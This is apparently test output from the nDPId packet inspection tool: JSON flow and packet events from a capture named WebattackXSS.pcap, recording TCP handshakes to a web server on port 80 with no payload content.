-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8756,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348024206,"flow_last_seen":1499348024206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348024206,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35168,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8756,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":618,"flow_packet_id":1,"flow_last_seen":1499348024206,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348024206,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82E1AAD4G7YKsEAABwKgKMolgAFCsqjf8AAAAAKACchD\/vgAAAgQFtAQCCAoBPO+xAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8757,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":618,"flow_packet_id":2,"flow_last_seen":1499348024206,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348024206,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiWCF9T2qrKo3\/aAScSB38wAAAgQFtAQCCAoD5sEkATzvsQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8758,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":618,"flow_packet_id":3,"flow_last_seen":1499348024207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348024207,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02E5AAD4G7YmsEAABwKgKMolgAFCsqjf9hfU9q4AQAOUW+wAAAQEICgE877ED5sEk"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8769,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348025497,"flow_last_seen":1499348025497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348025497,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35182,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8769,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":619,"flow_packet_id":1,"flow_last_seen":1499348025497,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348025497,"pkt":"ABm5CmnxAMGxFOsxCABFAAA856FAAD4G3i6sEAABwKgKMoluAFBIkhdSAAAAAKACchCDMQAAAgQFtAQCCAoBPPDzAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":619,"flow_packet_id":2,"flow_last_seen":1499348025497,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348025497,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiW4WAueQSJIXU6AScSDALwAAAgQFtAQCCAoD5sJnATzw8wEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8771,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":619,"flow_packet_id":3,"flow_last_seen":1499348025497,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348025497,"pkt":"ABm5CmnxAMGxFOsxCABFAAA056JAAD4G3jWsEAABwKgKMoluAFBIkhdTFgLnkYAQAOVfNwAAAQEICgE88PMD5sJn"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8790,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348028117,"flow_last_seen":1499348028117,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348028117,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35208,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8790,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":620,"flow_packet_id":1,"flow_last_seen":1499348028117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348028117,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80XFAAD4G9F6sEAABwKgKMomIAFDG6SLzAAAAAKACchD2jwAAAgQFtAQCCAoBPPOCAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8791,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":620,"flow_packet_id":2,"flow_last_seen":1499348028117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348028117,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiYg5g7TNxuki9KAScSBAQQAAAgQFtAQCCAoD5sT2ATzzggEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8792,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":620,"flow_packet_id":3,"flow_last_seen":1499348028118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348028118,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00XJAAD4G9GWsEAABwKgKMomIAFDG6SL0OYO0zoAQAOXfRwAAAQEICgE884MD5sT2"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8799,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348029395,"flow_last_seen":1499348029395,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029395,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35222,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8799,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":621,"flow_packet_id":1,"flow_last_seen":1499348029395,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348029395,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DoBAAD4Gt1CsEAABwKgKMomWAFBGnvpCAAAAAKACchCePQAAAgQFtAQCCAoBPPTCAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":621,"flow_packet_id":2,"flow_last_seen":1499348029395,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348029395,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiZaKxK9BRp76Q6AScSCa+QAAAgQFtAQCCAoD5sY2ATz0wgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":621,"flow_packet_id":3,"flow_last_seen":1499348029395,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348029395,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DoFAAD4Gt1esEAABwKgKMomWAFBGnvpDisSvQoAQAOU6AQAAAQEICgE89MID5sY2"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347895396,"flow_last_seen":1499347900875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33822,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347895396,"flow_last_seen":1499347900875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33822,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347896716,"flow_last_seen":1499347901875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33836,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347896716,"flow_last_seen":1499347901875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33836,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347899275,"flow_last_seen":1499347904876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33862,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347899275,"flow_last_seen":1499347904876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33862,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347900544,"flow_last_seen":1499347905875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33876,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347900544,"flow_last_seen":1499347905875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33876,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347903125,"flow_last_seen":1499347908876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33902,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347903125,"flow_last_seen":1499347908876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33902,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347904387,"flow_last_seen":1499347909877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33916,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347904387,"flow_last_seen":1499347909877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33916,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8811,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348030687,"flow_last_seen":1499348030687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348030687,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35236,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8811,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":622,"flow_packet_id":1,"flow_last_seen":1499348030687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348030687,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gAJAAD4GRc6sEAABwKgKMomkAFDF6nYHAAAAAKACchCh2wAAAgQFtAQCCAoBPPYFAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":622,"flow_packet_id":2,"flow_last_seen":1499348030687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348030687,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiaQ\/ByIUxep2CKAScSB2PwAAAgQFtAQCCAoD5sd5ATz2BQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8813,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":622,"flow_packet_id":3,"flow_last_seen":1499348030687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348030687,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gANAAD4GRdWsEAABwKgKMomkAFDF6nYIPwciFYAQAOUVRwAAAQEICgE89gUD5sd5"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8829,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348033296,"flow_last_seen":1499348033296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348033296,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35262,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8829,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":623,"flow_packet_id":1,"flow_last_seen":1499348033296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348033296,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LtJAAD4Glv6sEAABwKgKMom+AFA+iNZDAAAAAKACchDGWwAAAgQFtAQCCAoBPPiRAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8830,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":623,"flow_packet_id":2,"flow_last_seen":1499348033297,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348033297,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQib4da6BXPojWRKAScSA7jAAAAgQFtAQCCAoD5soFATz4kQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8831,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":623,"flow_packet_id":3,"flow_last_seen":1499348033297,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348033297,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LtNAAD4GlwWsEAABwKgKMom+AFA+iNZEHWugWIAQAOXakwAAAQEICgE8+JED5soF"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8842,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348034569,"flow_last_seen":1499348034569,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348034569,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35276,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8842,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":624,"flow_packet_id":1,"flow_last_seen":1499348034569,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348034569,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8z7RAAD4G9husEAABwKgKMonMAFCoJTZ7AAAAAKACchD7OgAAAgQFtAQCCAoBPPnPAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8843,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":624,"flow_packet_id":2,"flow_last_seen":1499348034569,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348034569,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiczTsUb+qCU2fKAScSASQAAAAgQFtAQCCAoD5stDATz5zwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8844,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":624,"flow_packet_id":3,"flow_last_seen":1499348034570,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348034570,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0z7VAAD4G9iKsEAABwKgKMonMAFCoJTZ807FG\/4AQAOWxRgAAAQEICgE8+dAD5stD"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8863,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348037175,"flow_last_seen":1499348037175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348037175,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35302,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8863,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":625,"flow_packet_id":1,"flow_last_seen":1499348037175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348037175,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MahAAD4GlCisEAABwKgKMonmAFDKJM3zAAAAAKACchA\/HQAAAgQFtAQCCAoBPPxbAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8864,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":625,"flow_packet_id":2,"flow_last_seen":1499348037175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348037175,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiebQGLVtyiTN9KAScSDovwAAAgQFtAQCCAoD5s3PATz8WwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8865,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":625,"flow_packet_id":3,"flow_last_seen":1499348037176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348037176,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MalAAD4GlC+sEAABwKgKMonmAFDKJM300Bi1boAQAOWHxwAAAQEICgE8\/FsD5s3P"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348038438,"flow_last_seen":1499348038438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348038438,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35316,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":626,"flow_packet_id":1,"flow_last_seen":1499348038438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348038438,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8j\/dAAD4GNdmsEAABwKgKMon0AFAYNXJgAAAAAKACchBLVgAAAgQFtAQCCAoBPP2XAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":626,"flow_packet_id":2,"flow_last_seen":1499348038438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348038438,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQifSSwJxVGDVyYaAScSBKLgAAAgQFtAQCCAoD5s8KATz9lwEDAwc="} 